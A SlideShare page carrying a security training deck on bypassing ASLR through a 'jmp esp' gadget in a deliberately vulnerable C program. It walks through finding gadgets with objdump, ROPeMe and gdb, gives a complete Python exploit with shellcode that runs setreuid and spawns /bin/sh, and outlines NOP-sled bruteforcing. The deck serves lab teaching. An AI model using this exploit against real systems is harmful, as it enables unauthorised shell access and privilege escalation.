Suche senden
Hochladen
07 - Bypassing ASLR, or why X^W matters
•
1 gefällt mir
•
2,004 views
A
Alexandre Moneger
Folgen
* Introduction to ASLR bypass
Weniger lesen
Mehr lesen
Ingenieurwesen
Melden
Teilen
Melden
Teilen
1 von 21
Empfohlen
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
Linux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
Design and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
Course lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented Programming
Jonathan Salwan
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days
Alexandre Moneger
Empfohlen
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
Linux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
Design and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
Course lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented Programming
Jonathan Salwan
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days
Alexandre Moneger
Return oriented programming (ROP)
Return oriented programming (ROP)
Pipat Methavanitpong
深入淺出C語言
深入淺出C語言
Simen Li
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
Network security Lab manual
Network security Lab manual
Vivek Kumar Sinha
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
Network security mannual (2)
Network security mannual (2)
Vivek Kumar Sinha
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
DefconRussia
IT6712 lab manual
IT6712 lab manual
Madhu Amarnath
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
ROP 輕鬆談
ROP 輕鬆談
hackstuff
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Svetlana Gaivoronski
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
Codes
Codes
Narayan Loke
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu
Introduction to Debuggers
Introduction to Debuggers
Saumil Shah
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
iCloud keychain
iCloud keychain
Alexey Troshichev
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
Weitere ähnliche Inhalte
Was ist angesagt?
Return oriented programming (ROP)
Return oriented programming (ROP)
Pipat Methavanitpong
深入淺出C語言
深入淺出C語言
Simen Li
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
Network security Lab manual
Network security Lab manual
Vivek Kumar Sinha
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
Network security mannual (2)
Network security mannual (2)
Vivek Kumar Sinha
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
DefconRussia
IT6712 lab manual
IT6712 lab manual
Madhu Amarnath
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
ROP 輕鬆談
ROP 輕鬆談
hackstuff
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Svetlana Gaivoronski
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
Codes
Codes
Narayan Loke
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu
Introduction to Debuggers
Introduction to Debuggers
Saumil Shah
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
iCloud keychain
iCloud keychain
Alexey Troshichev
Was ist angesagt?
(20)
Return oriented programming (ROP)
Return oriented programming (ROP)
深入淺出C語言
深入淺出C語言
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
Network security Lab manual
Network security Lab manual
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Network security mannual (2)
Network security mannual (2)
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
IT6712 lab manual
IT6712 lab manual
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
ROP 輕鬆談
ROP 輕鬆談
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Codes
Codes
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Introduction to Debuggers
Introduction to Debuggers
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
iCloud keychain
iCloud keychain
Andere mochten auch
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
Java Shellcode Execution
Java Shellcode Execution
Ryan Wincey
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
Z Chen
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
Talking about exploit writing
Talking about exploit writing
sbha0909
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Positive Hack Days
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
Julia Yu-Chin Cheng
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
Software Exploits
Software Exploits
KevinCSmallwood
Shellcode injection
Shellcode injection
Dhaval Kapil
Writing Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
Low Level Exploits
Low Level Exploits
hughpearse
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
nullowaspmumbai
Advanced exploit development
Advanced exploit development
Dan H
The State of the Veil Framework
The State of the Veil Framework
VeilFramework
Andere mochten auch
(20)
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Java Shellcode Execution
Java Shellcode Execution
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Talking about exploit writing
Talking about exploit writing
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Software Exploits
Software Exploits
Shellcode injection
Shellcode injection
Writing Metasploit Plugins
Writing Metasploit Plugins
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Low Level Exploits
Low Level Exploits
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
Advanced exploit development
Advanced exploit development
The State of the Veil Framework
The State of the Veil Framework
Ähnlich wie 07 - Bypassing ASLR, or why X^W matters
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Alexandre Moneger
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
Alexandre Moneger
Code Red Security
Code Red Security
Amr Ali
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
Power of linked list
Power of linked list
Peter Hlavaty
不深不淺,帶你認識 LLVM (Found LLVM in your life)
不深不淺,帶你認識 LLVM (Found LLVM in your life)
Douglas Chen
Linux networking
Linux networking
Arie Bregman
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
Faisal Akber
Racing with Droids
Racing with Droids
Peter Hlavaty
Shellcoding in linux
Shellcoding in linux
Ajin Abraham
AllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW Security
AllBits BVBA (freelancer)
C++ Core Guidelines
C++ Core Guidelines
Thomas Pollak
Kernel Recipes 2014 - Writing Code: Keep It Short, Stupid!
Kernel Recipes 2014 - Writing Code: Keep It Short, Stupid!
Anne Nicolas
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend
Alexandre Moneger
New features in Ruby 2.5
New features in Ruby 2.5
Ireneusz Skrobiś
fg.workshop: Software vulnerability
fg.workshop: Software vulnerability
fg.informatik Universität Basel
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
ARM procedure calling conventions and recursion
ARM procedure calling conventions and recursion
Stephan Cadene
Finding 0days at Arab Security Conference
Finding 0days at Arab Security Conference
Rodolpho Concurde
Ähnlich wie 07 - Bypassing ASLR, or why X^W matters
(20)
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
Code Red Security
Code Red Security
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Power of linked list
Power of linked list
不深不淺,帶你認識 LLVM (Found LLVM in your life)
不深不淺,帶你認識 LLVM (Found LLVM in your life)
Linux networking
Linux networking
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
Racing with Droids
Racing with Droids
Shellcoding in linux
Shellcoding in linux
AllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW Security
C++ Core Guidelines
C++ Core Guidelines
Kernel Recipes 2014 - Writing Code: Keep It Short, Stupid!
Kernel Recipes 2014 - Writing Code: Keep It Short, Stupid!
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend
New features in Ruby 2.5
New features in Ruby 2.5
fg.workshop: Software vulnerability
fg.workshop: Software vulnerability
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
ARM procedure calling conventions and recursion
ARM procedure calling conventions and recursion
Finding 0days at Arab Security Conference
Finding 0days at Arab Security Conference
Kürzlich hochgeladen
System Simulation and Modelling with types and Event Scheduling
System Simulation and Modelling with types and Event Scheduling
BootNeck1
Ch10-Global Supply Chain - Cadena de Suministro.pdf
Ch10-Global Supply Chain - Cadena de Suministro.pdf
ChristianCDAM
Indian Dairy Industry Present Status and.ppt
Indian Dairy Industry Present Status and.ppt
Madan Karki
Risk Management in Engineering Construction Project
Risk Management in Engineering Construction Project
Erbil Polytechnic University
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
Asst.prof M.Gokilavani
Python Programming for basic beginners.pptx
Python Programming for basic beginners.pptx
mohitesoham12
chpater16.pptxMMMMMMMMMMMMMMMMMMMMMMMMMMM
chpater16.pptxMMMMMMMMMMMMMMMMMMMMMMMMMMM
NanaAgyeman13
Crushers to screens in aggregate production
Crushers to screens in aggregate production
ChinnuNinan
Engineering Drawing section of solid
Engineering Drawing section of solid
namansinghjarodiya
complete construction, environmental and economics information of biomass com...
complete construction, environmental and economics information of biomass com...
asadnawaz62
Instrumentation, measurement and control of bio process parameters ( Temperat...
Instrumentation, measurement and control of bio process parameters ( Temperat...
121011101441
Main Memory Management in Operating System
Main Memory Management in Operating System
Rashmi Bhat
POWER SYSTEMS-1 Complete notes examples
POWER SYSTEMS-1 Complete notes examples
Dr. Gudipudi Nageswara Rao
11. Properties of Liquid Fuels in Energy Engineering.pdf
11. Properties of Liquid Fuels in Energy Engineering.pdf
HafizMudaserAhmad
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
Sumanth A
Internet of things -Arshdeep Bahga .pptx
Internet of things -Arshdeep Bahga .pptx
VelmuruganTECE
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Erbil Polytechnic University
Input Output Management in Operating System
Input Output Management in Operating System
Rashmi Bhat
Designing pile caps according to ACI 318-19.pptx
Designing pile caps according to ACI 318-19.pptx
Erbil Polytechnic University
Gravity concentration_MI20612MI_________
Gravity concentration_MI20612MI_________
Romil Mishra
Kürzlich hochgeladen
(20)
System Simulation and Modelling with types and Event Scheduling
System Simulation and Modelling with types and Event Scheduling
Ch10-Global Supply Chain - Cadena de Suministro.pdf
Ch10-Global Supply Chain - Cadena de Suministro.pdf
Indian Dairy Industry Present Status and.ppt
Indian Dairy Industry Present Status and.ppt
Risk Management in Engineering Construction Project
Risk Management in Engineering Construction Project
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
Python Programming for basic beginners.pptx
Python Programming for basic beginners.pptx
chpater16.pptxMMMMMMMMMMMMMMMMMMMMMMMMMMM
chpater16.pptxMMMMMMMMMMMMMMMMMMMMMMMMMMM
Crushers to screens in aggregate production
Crushers to screens in aggregate production
Engineering Drawing section of solid
Engineering Drawing section of solid
complete construction, environmental and economics information of biomass com...
complete construction, environmental and economics information of biomass com...
Instrumentation, measurement and control of bio process parameters ( Temperat...
Instrumentation, measurement and control of bio process parameters ( Temperat...
Main Memory Management in Operating System
Main Memory Management in Operating System
POWER SYSTEMS-1 Complete notes examples
POWER SYSTEMS-1 Complete notes examples
11. Properties of Liquid Fuels in Energy Engineering.pdf
11. Properties of Liquid Fuels in Energy Engineering.pdf
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
Internet of things -Arshdeep Bahga .pptx
Internet of things -Arshdeep Bahga .pptx
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Input Output Management in Operating System
Input Output Management in Operating System
Designing pile caps according to ACI 318-19.pptx
Designing pile caps according to ACI 318-19.pptx
Gravity concentration_MI20612MI_________
Gravity concentration_MI20612MI_________
07 - Bypassing ASLR, or why X^W matters
1.
Bypassing ASLR Why
DEP matters Alex Moneger Security Engineer
2.
Refresher Classic
buffer overflows store the shellcode on the stack Shellcode is executed on the stack Execution transfer is done by jumping to a fixed address In modern OSs, addresses are randomized using ASLR Is there a zone which is not covered by ASLR? Can we exploit this? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
3.
Jmp reg ©
2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
4.
Approach Consider
DEP disabled. What impact does it have? DEP disabled = execution on the stack How can we transfer execution to the stack, without using fixed addresses? Maybe we can find a piece of code in the binary itself to do that? What asm construct redirects flows?: Call Jmp © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
5.
Where to look?
Remember, .text section is not subject to ASLR unless explicitely specified by the compiler (-pie -fpie) .text section is the only RE region which has fixed addresses Looks suitable to look for things which have a fixed address © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
6.
How to look
Manually: dahtah@kali:~/src/seccon/ch6$ objdump -d -j .text -M intel ch6 | egrep "jmp|call" | egrep -v "(call|jmp)[ t]+80" 8048387: ff d0 call eax 80483c4: ff d2 call edx 804840f: ff d0 call eax 804841f: ff e4 jmp esp 80484d4: ff 94 b3 00 ff ff ff call DWORD PTR [ebx+esi*4-0x100] A few nice ones. Jmp esp looks great. Remember what your stack looks like, just before return to seip © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
7.
Lazy searching
ROPeme is really nice, but is ROP oriented Therefore, only finds call/jmp preceding a ret dahtah@kali:~/src/seccon/ch6$ ropshell.py Simple ROP interactive shell: [generate, load, search] gadgets ROPeMe> generate ch6 4 Generating gadgets for ch6 with backward depth=4 It may take few minutes depends on the depth and file size... Processing code block 1/1 Generated 96 gadgets Dumping asm gadgets to file: ch6.ggt ... OK ROPeMe> search jmp % Searching for ROP gadget: jmp % with constraints: [] 0x804841fL: jmp esp ; pop ebp ;; 0x80483a0L: jmp far 0x75f8:0xd1d0011f ; add dh bl ;; ROPeMe> search call % Searching for ROP gadget: call % with constraints: [] 0x8048387L: call eax ; leave ;; 0x80483c4L: call edx ; leave ;; © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
8.
Proper searching
Write asm and generate raw binary (or look up opcodes) Search for bytes in memory x86 ISA specifies that opcodes: 1. have a varied length structure 2. Eip does not have to land on 4 bytes boundaries This approach can yield additional results when you know what your looking for (which you should ;)) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
9.
Example 1. Write
and compile the gadget your looking for: cisco@kali:~/src/seccon/ch6$ pygmentize -g jmp_esp.asm [bits 32] section .text: jmp esp cisco@kali:~/src/seccon/ch6$ nasm jmp_esp.asm cisco@kali:~/src/seccon/ch6$ hexdump jmp_esp 0000000 e4ff 0000002 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
10.
Example – 2
Search for the hex pattern using gdb cisco@kali:~/src/seccon/ch6$ invoke -d ch6 AAAA Reading symbols from /home/cisco/src/seccon/ch6/ch6...done. gdb$ break main Breakpoint 1 at 0x8048465: file ch6.c, line 16. gdb$ r Breakpoint 1, main (argc=2, argv=0xbffffe34) at ch6.c:16 16 vuln(argv[1]); gdb$ info proc mappings process 30215 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x8048000 0x8049000 0x1000 0 /home/dahtah/src/seccon/ch6/ch6 gdb$ find /h 0x8048000,0x8049000,0xe4ff 0x804841f <useless+3> 1 pattern found. gdb$ x/i 0x804841f 0x804841f <useless+3>: jmp esp © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
11.
Check what we
can use Check registers upon return of vulnerable function Does anything point or is a pointer to anything interesting? cisco@kali:~/src/seccon/ch6$ invoke -d ch6 AAAA Reading symbols from /home/cisco/src/seccon/ch6/ch6...done. gdb$ disassemble 0x08048459,0x0804845c Dump of assembler code from 0x8048459 to 0x804845c: 0x08048459 <vuln+54>: pop edi 0x0804845a <vuln+55>: pop ebp 0x0804845b <vuln+56>: ret End of assembler dump. gdb$ break *0x0804845b Breakpoint 1 at 0x804845b: file ch6.c, line 13. gdb$ info registers eax 0x1 1 ecx 0x0 0 edx 0x5 5 ebx 0xb7fbeff4 -1208225804 esp 0xbffffd6c 0xbffffd6c ebp 0xbffffd88 0xbffffd88 esi 0x0 0 edi 0x0 0 eip 0x804845b 0x804845b <vuln+56> © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
12.
Example Check
registers, nothing looks great Esp maybe?: gdb$ p/x &buf $1 = 0xbffffcfc gdb$ # Check buf + overflow length gdb$ p/x 0xbffffcfc + 0x74 $5 = 0xbffffd70 gdb$ # Move past ret, where is esp gdb$ si 0x8048475 <main+25>: mov eax,0x0 gdb$ info registers esp esp 0xbffffd70 0xbffffd70 gdb$ # esp points to our shellcode! © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
13.
Flow Find
a register pointing to our buffer Put the shellcode in the right position Find a jmp/call to reg Overflow seip with the address of jmp/call reg Execute shellcode upon ret shellcode &jmp_esp 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
14.
Example Same
vulnerable program, but with ASLR on cisco@kali:~/src/seccon/ch6$ pygmentize -g ch6.c #include <stdlib.h> #include <stdio.h> #include <string.h> void useless(void) { __asm__("jmp *%esp"); } int vuln(const char *stuff) { char buf[0x64] = {0}; strcpy(buf, stuff); return 1; } int main(int argc, char **argv) { vuln(argv[1]); return 0; } © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
15.
Exploit conditions
ASLR on, DEP off: cisco@kali:~/src/seccon/ch6$ /sbin/sysctl -a 2>/dev/null | grep randomize kernel.randomize_va_space = 2 cisco@kali:~/src/seccon/ch6$ cc ch6.c -fno-stack-protector -U_FORTIFY_SOURCE -z execstack -g -o ch6 cisco@kali:~/src/seccon/ch6$ ldd ch6 linux-gate.so.1 => (0xb778d000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb760c000) /lib/ld-linux.so.2 (0xb778e000) cisco@kali:~/src/seccon/ch6$ ldd ch6 linux-gate.so.1 => (0xb77bc000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb763b000) /lib/ld-linux.so.2 (0xb77bd000) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15
16.
Exploit dahtah@kali:~/src/seccon/ch6$ pygmentize
-g ch6.py #!/usr/bin/env python # -*- coding: utf-8 -*- import os import struct target = "ch6" overflow_len = 112 jmp_esp = 0x0804841f target_path = os.path.abspath(target) # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) sc = ("x6ax31x58x99xcdx80x89xc3x89xc1x6ax46" "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68" "x2fx2fx62x69x89xe3x89xd1xcdx80") jmp_esp_addr = struct.pack("<I", jmp_esp) ex = "%s%s%s" % ('A'*overflow_len, jmp_esp_addr, sc) os.execve(target_path, (target_path, ex), os.environ) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 16
17.
Other approaches ©
2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 17
18.
Bruteforce If
you can try multiple times, bruteforce is an option: 1. Pick an address for your buffer 2. Pad your shellcode with a NOP sled 3. Make your return address land in the middle of the NOP sled 4. Try once, then try again 5. and again, and again 6. Get shell Bruteforcing figures provided in ASLR section © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 18
19.
Conclusion © 2013-2014
Cisco and/or its affiliates. All rights reserved. Cisco Confidential 19
20.
Key points
ASLR is not very efficient without DEP ASLR efficiency is limited on 32 bits On a real world binary, chances you can find good gadgets are high Depending on gadgets and values in registers, not all bugs are cleanly exploitable with ASLR © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 20
21.
Get to work
Exploit ch6 with ASLR enabled Check the memory mappings of ch6. What is predictable? What changes? Search for various gadgets using nasm and gdb Bruteforce ch6 (do not rely on gadgets). How many tries does it take? How long? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 21